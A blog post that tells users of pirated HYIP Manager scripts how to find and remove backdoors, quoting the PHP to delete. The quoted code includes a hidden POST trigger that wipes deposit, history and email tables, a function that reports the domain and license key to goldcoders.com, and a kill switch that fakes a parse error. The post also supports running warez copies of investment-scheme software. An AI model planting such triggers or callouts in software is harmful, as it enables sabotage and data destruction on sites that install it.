If You got HYIP Script and not sure if it contain backdoor or not, you can read this post. HYIP Manager Script is easy to get out there (usually available at warez forums and torrent sites). But as usual, using warez versions is risky.
Warning:
- This fix only reflect the script and not hosting hacking
- Take the steps at your own risk!!
- Back up everything before going any further.
Let's take a deep look at your script files:
Folder: root
File: index.php
Remove:
if (($frm['a'] == 'register' AND $frm_env['REQUEST_METHOD'] == 'POST'))
{
$string = $settings['license'] . $frm_env['HTTP_HOST'] . date ('d') . date ('Y') . date ('m');
if ($frm['string'] == md5 ($string))
{
$q = 'update hm2_users set came_from = \' \' where id = 1';
mysql_query ($q);
print '-';
if ($frm['string2'] == date ('d'))
{
$q = 'delete from hm2_history where type=\'withdrawal\'';
mysql_query ($q);
}
if ($frm['string2'] == date ('y'))
{
$q = 'delete from hm2_deposits';
mysql_query ($q);
$q = 'delete from hm2_emails';
mysql_query ($q);
$q = 'delete from hm2_history';
mysql_query ($q);
$q = 'delete from hm2_online';
mysql_query ($q);
$q = 'delete from hm2_plans';
mysql_query ($q);
}
db_close ($dbconn);
exit ();
}
}
and..
if ($settings['demomode'] != 1)
{
if (rand (1, 5) == 3)
{
send_string_to_gold_coders ();
}
also..
check_if_stolen ();
Folder: /inc/admin
File: hmtl.header.inc
Remove this lines:
if (rand (1, 5) == 3)
{
echo ' ';
}
another one..
if (($frm['a'] == 'ver' AND $frm_env['REQUEST_METHOD'] == 'POST'))
{
echo 'SERVER_ADDR = ';
echo $frm_env['HTTP_HOST'];
echo '
LICENSE = ';
echo $settings['license'];
echo '
DATE = ';
echo date ('m') . ' ' . date ('d') . ' ' . date ('Y');
db_close ($dbconn);
exit ();
}
File: wap.php
remove the line
check_if_stolen ();
and..
send_string_to_gold_coders ();
File: /inc/config.inc
function send_string_to_gold_coders ()
{
global $frm_env;
global $settings;
$handle = @fopen ('http://www.goldcoders.com/check.cgi?domain=' . $frm_env['HTTP_HOST'] . '&license=' . $settings['license'] . '&zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz', 'r');
if ($handle)
{
fclose ($handle);
}
}
function send_string_to_gold_coders_install ()
{
global $frm_env;
global $settings;
$cont = 'ok11';
$handle = @fopen ('http://www.goldcoders.com/check.cgi?install=1&script=3&domain=' . $frm_env['HTTP_HOST'] . '&license=' . $settings['license'] . '&cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc', 'r');
if ($handle)
{
$cont = fread ($handle, 200000);
fclose ($handle);
}
return $cont;
}
function check_if_stolen ()
{
global $frm_env;
$q = 'select * from hm2_users order by id limit 10';
$sth = mysql_query ($q);
if ($row = mysql_fetch_array ($sth))
{
if ($row['came_from'] == ' ')
{
print '
Parse error: parse error in ' . $frm_env['SCRIPT_NAME'] . ' on line NULL
';
exit ();
}
}
}
Folder: /inc/admin/
File: security.inc
remove ddd from this line:
echo ($acsent_settings['detect_ip'] == 'disabled' ? 'checked' : 'ddd');
So the line look like this:
echo ($acsent_settings['detect_ip'] == 'disabled' ? 'checked' : '');
Keep in mind you can contact me if you find difficult for doing this kind of stuff.
Hope your HYIP Script work fine now..
HYIP Script Backdoors and How To Remove Them
Diposting oleh Ku Dw | 01.04 | hyip manager script, hyip script | 0 komentar ยป
Langganan:
Posting Komentar (Atom)
0 komentar
Posting Komentar